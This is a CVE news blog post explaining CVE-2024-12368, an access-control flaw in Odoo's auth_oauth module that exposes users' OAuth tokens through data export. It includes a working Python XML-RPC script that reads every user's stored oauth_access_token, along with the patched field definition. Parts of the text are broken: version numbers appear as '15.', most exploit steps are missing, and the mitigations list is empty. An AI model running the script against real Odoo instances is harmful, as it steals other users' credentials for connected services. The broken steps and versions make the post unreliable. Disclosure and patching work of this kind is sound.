CVE CyberSecurity Database News

CVE-2024-12368 - How Odoo’s auth_oauth Module Exposed User OAuth Tokens (With Exploit Details)

Poster -

CVE-2024-12368 is a critical vulnerability affecting Odoo Community 15. and Odoo Enterprise 15.. At the core of this vulnerability is improper access control in the auth_oauth module, allowing any internal user with export rights to extract other users’ OAuth tokens—credentials that should always remain private. In this post, I’ll break down what happened, show you the code, demonstrate the exploitation process, and explain how to fix and protect your Odoo installation.

What is Odoo’s auth_oauth module?

Odoo is an open-source business app suite. Its auth_oauth module lets users log in using third-party services like Google or Facebook, generating OAuth tokens in the process. These tokens are sensitive—stealing them can give attackers access to connected accounts or services.

Vulnerability Overview

CVE-2024-12368: *Improper access control in auth_oauth allows internal users to export OAuth tokens of other users.*

Severity: High
Attack Vector: Internal (any logged-in user)
Component: auth_oauth
Versions: 15. (Community and Enterprise)
CWE: CWE-284: Improper Access Control
Reference: Odoo Advisory

Technical Details

Normally in Odoo, exporting fields that contain sensitive data is restricted. However, in Odoo 15., the auth_oauth module stored OAuth tokens in the res.users model in a field called oauth_access_token (and sometimes oauth_uid). Because the export access rule for this model did not restrict sensitive fields, any internal user could export all users’ OAuth tokens.

Vulnerable Code Snippet

# In auth_oauth/models/res_users.py (Odoo 15.)
class Users(models.Model):
    _inherit = 'res.users'

    oauth_provider_id = fields.Many2one('auth.oauth.provider', ...)
    oauth_uid = fields.Char(...)
    oauth_access_token = fields.Char(...)

Here, all fields—including the sensitive oauth_access_token—are exported with standard Odoo export functionality.

Exploiting CVE-2024-12368 (Step-by-Step)

Prerequisites:

In the export dialog, add the field OAuth Access Token.

7. Complete the export—Odoo will generate a CSV/excel file containing all users’ tokens.

Sample CSV Output

id,login,oauth_access_token
3,alice,ya29.aAWY...
4,bob,ya29.aARrda...

With these tokens, an attacker can impersonate other users on third-party services or abuse connected APIs.

Let’s automate the attack with a Python script using Odoo’s XML-RPC API

import xmlrpc.client

url = 'https://your-odoo-instance.com';
db = 'your_odoo_db'
username = 'employee_user'
password = 'password'

common = xmlrpc.client.ServerProxy(f'{url}/xmlrpc/2/common')
uid = common.authenticate(db, username, password, {})

models = xmlrpc.client.ServerProxy(f'{url}/xmlrpc/2/object')

# Search all users
user_ids = models.execute_kw(db, uid, password, 'res.users', 'search', [[]])

# Read oauth_access_token field
tokens = models.execute_kw(db, uid, password, 'res.users', 'read', [user_ids], {'fields': ['login', 'oauth_access_token']})

for user in tokens:
    print(f"User: {user['login']} - Token: {user['oauth_access_token']}")

> Warning: This script is for educational and testing purposes *only*. Never use it without proper authorization.

Impact

- Data breach: Confidential OAuth tokens give attackers the ability to login as users on connected services.
- Privilege escalation: Attackers could access other SaaS or cloud services tied to any user’s account, including admins.
- Compliance violation: This leak could trigger GDPR/CCPA/other data protection issues.

Solution & Mitigation

Upgrade Odoo:
Odoo issued a security update to patch this vulnerability. In patched versions, the oauth_access_token field is protected:

    oauth_access_token = fields.Char(..., groups='base.group_system')

Only system administrators (technical users) can export or view these fields now.

Other Mitigations:

More Information

- Odoo Security Announcements
- Odoo auth_oauth documentation
- Official CVE Entry *(when published)*

Conclusion

CVE-2024-12368 shows how a small oversight in export permissions can have a massive impact. If you operate Odoo 15.—Community or Enterprise—patch immediately and check your logs for suspicious exports. Sensitive token fields should always have extra access controls!

Have questions or stories to share about Odoo security? Comment below or reach out directly!


*This is an exclusive, original breakdown for educational purposes. Please apply responsible disclosure and patch your systems.*

Timeline

Published on: 02/25/2025 18:15:27 UTC
Last modified on: 02/28/2025 15:40:59 UTC